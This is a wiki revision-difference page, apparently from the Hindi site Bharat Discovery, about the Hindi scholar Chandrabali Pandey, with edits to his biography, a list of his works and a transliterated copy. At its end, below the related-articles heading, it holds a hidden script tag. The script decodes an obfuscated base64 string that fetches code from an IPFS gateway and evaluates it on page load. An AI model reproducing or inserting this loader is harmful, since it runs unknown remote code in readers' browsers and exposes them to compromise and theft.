Difference between revisions of "चन्द्रबली पाण्डेय"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
*चन्द्रबली पाण्डेय (जन्म- [[1904]] ई.; मृत्यु- [[1958]] ई.) [[हिन्दी भाषा]] और [[साहित्य]] के उन्नयन, संवर्धन और संरक्षण के लिए समर्पित किया।
+
*चन्द्रबली पाण्डेय (जन्म- [[1904]] ई.; मृत्यु- [[1958]] ई.) [[हिन्दी भाषा]] और [[साहित्य]] के उन्नयन, संवर्धन और संरक्षण के लिए समर्पित थे।
*चन्द्रबली का जन्म [[उत्तर प्रदेश]] के [[आज़मगढ़ ज़िला|आज़मगढ़ ज़िले]] के एक गाँव में हुआ था।  
+
*चन्द्रबली का जन्म [[1904]] में [[उत्तर प्रदेश]] के [[आज़मगढ़ ज़िला|आज़मगढ़ ज़िले]] के एक गाँव में हुआ था।  
*चन्द्रबली ने हिन्दी की उच्च शिक्षा [[काशी हिन्दू विश्वविद्यालय]] में प्राप्त की। चन्द्रबली आचार्य [[रामचन्द्र शुक्ल]] के प्रिय शिष्य थे।  
+
*चन्द्रबली ने हिन्दी की उच्च शिक्षा [[काशी हिन्दू विश्वविद्यालय]] से प्राप्त की। आचार्य [[रामचन्द्र शुक्ल]] के आप प्रिय शिष्य थे।
*चन्द्रबली ने विश्वविद्यालय की परिधि से बाहर रहकर हिन्दी में शोध कार्य करने वालों में आपना प्रमुख स्थान बनाया।
+
*विश्वविद्यालय की परिधि से बाहर रहकर हिन्दी में शोध कार्य करने वालों में आपका प्रमुख स्थान है।
*हिन्दी के साथ [[अंग्रेज़ी]], [[उर्दू]], [[फ़ारसी भाषा|फ़ारसी]], [[अरबी भाषा|अरबी]] तथा प्राकृत भाषाओं के ज्ञाता चन्द्रबली पाण्डेय के सम्बन्ध में भाषा शास्त्री डॉ. सुनीति कुमार चटर्जी की यह उक्ति सटीक है कि, "पाण्डेय जी के एक-एक पैंफलेट भी डॉक्टरेट के लिए पर्याप्त हैं।"
+
*हिन्दी के साथ [[अंग्रेज़ी]], [[उर्दू]], [[फ़ारसी भाषा|फ़ारसी]], [[अरबी भाषा|अरबी]] तथा [[प्राकृत]] भाषाओं के ज्ञाता चन्द्रबली पाण्डेय के सम्बन्ध में भाषा शास्त्री डॉ. सुनीति कुमार चटर्जी की यह उक्ति सटीक है कि, '''पाण्डेय जी के एक-एक पैंफलेट भी डॉक्टरेट के लिए पर्याप्त हैं।'''
 
*आजीवन अविवाहित रहकर चन्द्रबली ने हिन्दी की सेवा की थी। अपनी व्यक्तिगत सुख-सुविधा के लिए चन्द्रबली ने कभी चेष्टा नहीं की थी।  
 
*आजीवन अविवाहित रहकर चन्द्रबली ने हिन्दी की सेवा की थी। अपनी व्यक्तिगत सुख-सुविधा के लिए चन्द्रबली ने कभी चेष्टा नहीं की थी।  
 
*चन्द्रबली के द्वारा रचित छोटे-बड़े कुल ग्रन्थों की संख्या लगभग 34 है।  
 
*चन्द्रबली के द्वारा रचित छोटे-बड़े कुल ग्रन्थों की संख्या लगभग 34 है।  
 
==प्रमुख रचनाएँ==
 
==प्रमुख रचनाएँ==
 +
पाण्डेय जी की प्रमुख रचनाएँ हैं, जो इस प्रकार है:-
 
*उर्दू का रहस्य
 
*उर्दू का रहस्य
 
*तसव्वुफ़ अथवा सूफ़ीमत
 
*तसव्वुफ़ अथवा सूफ़ीमत
Line 17: Line 18:
 
*शूद्रक
 
*शूद्रक
 
*हिन्दी गद्य का निर्माण
 
*हिन्दी गद्य का निर्माण
 +
==निधन==
 +
चन्द्रबली पाण्डेय का निधन 1958 ई. में हो गया था।
  
 
{{प्रचार}}
 
{{प्रचार}}

Revision as of 11:16, 4 May 2011

  • chandrabali pandey (janm- 1904 ee.; mrityu- 1958 ee.) hindi bhasha aur sahity ke unnayan, sanvardhan aur sanrakshan ke lie samarpit the.
  • chandrabali ka janm 1904 mean uttar pradesh ke azamagadh zile ke ek gaanv mean hua tha.
  • chandrabali ne hindi ki uchch shiksha kashi hindoo vishvavidyalay se prapt ki. achary ramachandr shukl ke ap priy shishy the.
  • vishvavidyalay ki paridhi se bahar rahakar hindi mean shodh kary karane valoan mean apaka pramukh sthan hai.
  • hindi ke sath aangrezi, urdoo, farasi, arabi tatha prakrit bhashaoan ke jnata chandrabali pandey ke sambandh mean bhasha shastri d aau. suniti kumar chatarji ki yah ukti satik hai ki, pandey ji ke ek-ek paianphalet bhi d aauktaret ke lie paryapt haian.
  • ajivan avivahit rahakar chandrabali ne hindi ki seva ki thi. apani vyaktigat sukh-suvidha ke lie chandrabali ne kabhi cheshta nahian ki thi.
  • chandrabali ke dvara rachit chhote-b de kul granthoan ki sankhya lagabhag 34 hai.

pramukh rachanaean

pandey ji ki pramukh rachanaean haian, jo is prakar hai:-

  • urdoo ka rahasy
  • tasavvuf athava soofimat
  • bhasha ka prashn
  • rashtrabhasha par vichar
  • kalidas
  • keshavadas
  • tulasidas
  • hindi kavi charcha
  • shoodrak
  • hindi gady ka nirman

nidhan

chandrabali pandey ka nidhan 1958 ee. mean ho gaya tha.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

liladhar, sharma bharatiy charit kosh (hindi). bharatadiskavari pustakalay: shiksha bharati, 265.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>